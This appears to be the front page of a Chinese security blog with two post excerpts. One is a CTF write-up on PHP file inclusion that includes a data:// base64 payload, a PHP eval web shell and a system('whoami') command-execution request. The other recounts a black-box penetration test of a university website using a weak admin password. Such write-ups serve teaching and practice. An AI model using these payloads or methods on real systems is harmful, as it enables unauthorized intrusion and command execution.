TypechoJoeTheme

MUCN博客

统计
登录
用户名
密码
/
注册
用户名
邮箱

最新文章

2021-02-09

CTF文件包含类例题

CTF文件包含类例题
提到文件包含肯定第一处想到的知识点就是 php伪协议(暂无此文)例题:ctf.show_web3进入界面首先一段代码:如果直接传入数据流 include是无法包含的但是可以使用php的伪协议进行传入数据流,让include进行包含原始数据流payload?url=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==写一个代码执行:<?php eval($_REQUEST[mucn]); ?> base64编码后: PD9waHAgZXZhbCgkX1JFUVVFU1RbbXVjbl0pOyA/Pg==payload?url=data://text/plain;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbbXVjbl0pOyA/Pg==&mucn=system(%27whoami%27);//命令执行总结:非常基础的文件包含例题例题:ctf.show_web4进入界面:和web3一样的界面使用上题一样的手法进行尝试:发现error 目测是拦截开始逐个判断是拦截了哪些内容Php 拦截D...
2021年02月09日
45 阅读
0 评论
2020-11-06

[渗透实战]记一次某高校网站的黑盒测试

[渗透实战]记一次某高校网站的黑盒测试
0x1漏洞来源啊吧啊吧啊吧啊吧啊吧啊吧啊吧啊吧,啊吧啊吧啊吧啊吧啊吧啊吧啊吧啊吧两天后他找我了,他找到子域中的一处弱口令,内部存在w+信息泄露,果然努力的人运气都不会差,tql 要是我应该是测不到这处弱口令的 这个弱口令是admin/666666在我的字典里还就真没得这个666666的口令。。0x2信息收集:目前拥有:后台admin权限web指纹:.net系统(就这个一个就够了 至少知道该上传啥马了)waf类别:铱迅waf (本人亲眼见过rg哥以前bypass过这waf 手动狗头)0x3渗透测试看见能上传图片,首选肯定是测试上传漏洞.(此处本应该有图的 可惜我帅就不放截图了)结果:不出所料,ip被禁.等待ip解禁 尝试注入 无奈网站太多查询啥的 接口太多 试了几个决定放弃(心想:mmp这玩意估计是没得漏洞了)如果是大佬接下来的操作估计就是bypass waf-上传木马-getshell-横向渗透-拿下域控可惜了我不是不要说啥xss csrf啥的 那些测得没得没啥意思.【硬气】0x4横向查找,寻找不存在waf的同类型站点测试漏洞(当然这个横向查找这个词是我自编的)经过简单的搜索找到...
2020年11月06日
434 阅读
0 评论

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

标签云